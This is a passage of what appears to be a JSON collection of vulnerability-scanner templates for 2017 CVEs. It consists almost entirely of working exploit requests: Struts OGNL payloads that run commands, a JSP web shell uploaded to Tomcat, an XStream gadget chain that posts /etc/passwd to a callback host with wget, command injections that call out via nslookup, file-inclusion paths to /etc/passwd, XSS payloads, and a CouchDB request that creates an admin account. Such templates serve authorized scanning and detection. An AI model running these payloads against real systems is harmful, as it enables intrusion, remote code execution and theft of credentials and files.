text/xml\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,\nContent-Type: text/xml;charset=UTF-8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header>\n    <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n      <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n        <void id=\"url\" class=\"java.net.URL\">\n          <string>http://{{interactsh-url}}</string>\n        </void>\n        <void idref=\"url\">\n          <void id=\"stream\" method =\"openStream\"/>\n        </void>\n      </java>\n    </work:WorkContext>\n    </soapenv:Header>\n  <soapenv:Body/>\n</soapenv:Envelope>\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-7391","info":{"name":"Magmi 0.7.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain);</script><"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14622","info":{"name":"WordPress 2kb Amazon Affiliates Store <2.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=kbAmz&kbAction=demo%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 500","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"2kb-amazon-affiliates-store\")"],"condition":"and"}]}]},{"id":"CVE-2017-12611","info":{"name":"Apache Struts2 S2-053 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-15287","info":{"name":"Dreambox WebControl 2.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"word","words":["Unknown command: <script>alert(document.cookie)</script>"]}]}]},{"id":"CVE-2017-12794","info":{"name":"Django Debug Page - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000163","info":{"name":"Phoenix Framework - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?redirect=/\\interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2017-12617","info":{"name":"Apache Tomcat - Remote Code Execution","severity":"high"},"requests":[{"raw":["PUT /{{randstr}}.jsp/ HTTP/1.1\nHost: {{Hostname}}\n\n<% out.println(\"CVE-2017-12617\");%>\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["CVE-2017-12617"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12542","info":{"name":"HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/v1/AccountService/Accounts"],"headers":{"Connection":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["iLO User"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9140","info":{"name":"Reflected XSS - Telerik Reporting Module","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)"],"matchers-condition":"and","matchers":[{"type":"word","words":["#000000\"onload=\"prompt(1)","Telerik.ReportViewer.axd?name=Resources"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14186","info":{"name":"FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["location=decodeURIComponent(\"javascript%3Aalert%28document.domain%29\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-15647","info":{"name":"FiberHome Routers - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17059","info":{"name":"WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1"],"body":"amty_hidden=1","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12635","info":{"name":"Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation","severity":"critical"},"requests":[{"raw":["PUT /_users/org.couchdb.user:poc HTTP/1.1\nHost:  {{Hostname}}\nAccept: application/json\n\n{\n  \"type\": \"user\",\n  \"name\": \"poc\",\n  \"roles\": [\"_admin\"],\n  \"roles\": [],\n  \"password\": \"123456\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","Location:"]},{"type":"word","part":"body","words":["org.couchdb.user:poc","conflict","Document update conflict"]},{"type":"status","status":[201,409]}]}]},{"id":"CVE-2017-12138","info":{"name":"XOOPS Core 2.5.8 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /user.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login\n","GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2017-1000028","info":{"name":"Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd","{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-15363","info":{"name":"Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<?php","'host'","'database'","'extConf'","'debug'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11512","info":{"name":"ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\\..\\Windows\\win.ini","{{BaseURL}}/fosagent/repl/download-snapshot?name=..\\..\\..\\..\\..\\..\\..\\Windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2017-1000029","info":{"name":"Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/resource/file%3a///etc/passwd/"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-16894","info":{"name":"Laravel <5.5.21 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.env"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["APP_NAME=","APP_DEBUG=","DB_PASSWORD="],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12615","info":{"name":"Apache Tomcat Servers - Remote Code Execution","severity":"high"},"requests":[{"method":"PUT","path":["{{BaseURL}}/poc.jsp/"],"body":"<%@ page import=\"java.util.*,java.io.*\"%>\n<%\nif (request.getParameter(\"cmd\") != null) {\n        out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\n        Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n        OutputStream os = p.getOutputStream();\n        InputStream in = p.getInputStream();\n        DataInputStream dis = new DataInputStream(in);\n        String disr = dis.readLine();\n        while ( disr != null ) {\n                out.println(disr);\n                disr = dis.readLine();\n                }\n        }\n%>\n","headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9288","info":{"name":"WordPress Raygun4WP <=1.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000170","info":{"name":"WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"],"body":"dir=%2Fetc%2F&onlyFiles=true","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<li class='file ext_passwd'>","<a rel='/passwd'>passwd</a></li>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5638","info":{"name":"Apache Struts 2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd=\"cat /etc/passwd\",#cmds={\"/bin/bash\",\"-c\",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14135","info":{"name":"OpenDreambox 2.0.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/bin/sh","/usr/script"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-15944","info":{"name":"Palo Alto Network PAN-OS - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\";user|s.\"1337\"; HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID={{randstr}};\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["@start@Success@end@"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-10075","info":{"name":"Oracle Content Server - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup=&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO","{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","ORACLE_QUERY"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9506","info":{"name":"Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-6090","info":{"name":"PhpColl 2.5.1 Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137\n\n-----------------------------154934846911423734231554128137\nContent-Disposition: form-data; name=\"upload\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php echo md5('phpcollab_rce');?>\n\n-----------------------------154934846911423734231554128137--\n","GET /logos_clients/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["48dbd2384cb6b996fa1e2855c7f0567f"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11610","info":{"name":"XML-RPC Server - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /RPC2 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/xml\nContent-type: text/xml\n\n<methodCall>\n  <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>\n  <params>\n    <param>\n      <string>nslookup {{interactsh-url}}</string>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["text/xml"]},{"type":"word","part":"body","words":["<methodResponse>","<int>"],"condition":"and"}]}]},{"id":"CVE-2017-0929","info":{"name":"DotNetNuke (DNN) ImageHandler <9.2.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2017-15715","info":{"name":"Apache httpd <=2.4.29 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ\n\n------WebKitFormBoundaryKc8fBVDo558U4hbJ\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\n\n{{randstr_1}}\n\n------WebKitFormBoundaryKc8fBVDo558U4hbJ\nContent-Disposition: form-data; name=\"name\"\n\n{{randstr}}.php\\x0A\n------WebKitFormBoundaryKc8fBVDo558U4hbJ--\n","GET /{{randstr}}.php\\x0A HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip,deflate\nAccept: */*\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"{{randstr_1}}\")"]}]}]},{"id":"CVE-2017-5982","info":{"name":"Kodi 17.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9416","info":{"name":"Odoo 8.0/9.0/10.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/base_import/static/c:/windows/win.ini","{{BaseURL}}/base_import/static/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-17562","info":{"name":"Embedthis GoAhead <3.6.5 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"payloads":{"endpoint":["admin","apply","non-CA-rev","cgitest","checkCookie","check_user","chn/liveView","cht/liveView","cnswebserver","config","configure/set_link_neg","configure/swports_adjust","eng/liveView","firmware","getCheckCode","get_status","getmac","getparam","guest/Login","home","htmlmgr","index","index/login","jscript","kvm","liveView","login","login.asp","login/login","login/login-page","login_mgr","luci","main","main-cgi","manage/login","menu","mlogin","netbinary","nobody/Captcha","nobody/VerifyCode","normal_userLogin","otgw","page","rulectl","service","set_new_config","sl_webviewer","ssi","status","sysconf","systemutil","t/out","top","unauth","upload","variable","wanstatu","webcm","webmain","webproc","webscr","webviewLogin","webviewLogin_m64","webviewer","welcome"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["environment variable","display library search paths"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17451","info":{"name":"WordPress Mailster <=1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5631","info":{"name":"KMCIS CaseAware - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5487","info":{"name":"WordPress Core <4.7.1 - Username Enumeration","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/users/","{{BaseURL}}/?rest_route=/wp/v2/users/"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"name\":","\"avatar_urls\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"json","name":"usernames","json":[".[] | .slug",".[].name"],"part":"body"}]}]},{"id":"CVE-2017-14651","info":{"name":"WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","Failed to add new collection"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2017-18536","info":{"name":"WordPress Stop User Enumeration <=1.3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12583","info":{"name":"DokuWiki - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=<svg%20onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unable to parse at parameter \"<svg onload=alert(document.domain)>\".</div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5521","info":{"name":"NETGEAR Routers - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/passwordrecovered.cgi?id={{rand_base(5)}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["right\">Router\\s*Admin\\s*Username<","right\">Router\\s*Admin\\s*Password<"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-8917","info":{"name":"Joomla! <3.7.1 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2017-1000486","info":{"name":"Primetek Primefaces 5.x - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\npfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D\n"],"matchers":[{"type":"word","part":"header","words":["Mogwailabs: CHECKCHECK"]}]}]},{"id":"CVE-2017-12637","info":{"name":"SAP NetWeaver Application Server Java 7.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.."],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["WEB-INF","META-INF"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9805","info":{"name":"Apache Struts2 S2-052 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/struts2-rest-showcase/orders/3","{{BaseURL}}/orders/3"],"body":"<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\n        <dataHandler>\n          <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\n            <is class=\"javax.crypto.CipherInputStream\">\n              <cipher class=\"javax.crypto.NullCipher\">\n                <initialized>false</initialized>\n                <opmode>0</opmode>\n                <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\n                  <iter class=\"javax.imageio.spi.FilterIterator\">\n                    <iter class=\"java.util.Collections$EmptyIterator\"/>\n                    <next class=\"java.lang.ProcessBuilder\">\n                      <command>\n                        <string>wget</string>\n                        <string>--post-file</string>\n                        <string>/etc/passwd</string>\n              <string>{{interactsh-url}}</string>\n                      </command>\n                      <redirectErrorStream>false</redirectErrorStream>\n                    </next>\n                  </iter>\n                  <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\n                    <method>\n                      <class>java.lang.ProcessBuilder</class>\n                      <name>start</name>\n                      <parameter-types/>\n                    </method>\n                    <name>asdasd</name>\n                  </filter>\n                  <next class=\"string\">asdasd</next>\n                </serviceIterator>\n                <lock/>\n              </cipher>\n              <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\n              <ibuffer></ibuffer>\n              <done>false</done>\n              <ostart>0</ostart>\n              <ofinish>0</ofinish>\n              <closed>false</closed>\n            </is>\n            <consumed>false</consumed>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n</map>\n","headers":{"Content-Type":"application/xml"},"matchers-condition":"and","matchers":[{"type":"word","words":["Debugging information","com.thoughtworks.xstream.converters.collections.MapConverter"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2017-16806","info":{"name":"Ulterius Server < 1.9.5.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini","{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7615","info":{"name":"MantisBT <=2.30 - Arbitrary Password Reset/Admin Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantis/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantisBT/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash=","{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<input type=\"hidden\" name=\"account_update_token\" value=\"([a-zA-Z0-9_-]+)\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9841","info":{"name":"PHPUnit - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET 